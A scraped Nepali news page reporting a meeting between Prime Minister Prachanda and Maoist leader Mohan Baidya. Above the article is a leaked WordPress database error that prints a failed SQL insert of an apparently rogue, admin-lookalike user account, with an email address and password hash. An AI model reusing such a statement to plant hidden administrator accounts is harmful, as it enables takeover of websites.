WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bhhq3pg.CNnzw8kfMwF3d5iaAJyuhc0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 16:57:58', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंंसिर २६ –
प्रधानमन्त्री पुष्पकमल दाहाल ‘प्रचण्ड’ र नेकपा ९क्रान्तिकारी माओवादी० का अध्यक्ष मोहन वैद्यबीच मुलुकको पछिल्लो राजनीतिक अवस्थाका बारेमा छलफल भएको छ ।
प्रधानमन्त्री निवास बालुवाटारमा आज भएको भेटमा समसामयिक राजनीति, संविधान कार्यान्वयन लगायत विषयमा कुराकानी भएको प्रधानमन्त्रीको निजी सचिवालयले जनाएको छ ।
भेटका क्रममा क्रान्तिकारी माओवादीका अध्यक्ष वैद्यले प्रधानमन्त्रीलाई ६२ औंँ जन्मदिनको शुभकामना व्यक्त गर्नुभएको थियो । सो अवसरमा प्रधानमन्त्रीले जन्मदिनको शुभकामना दिनुभएकामा नेता वैद्यलाई धन्यवाद दिँदै समसामयिक राजनीतिक विषयमा सरकारले लिएका निर्णयबारे अवगत गराउनुभएको थियो । – रासस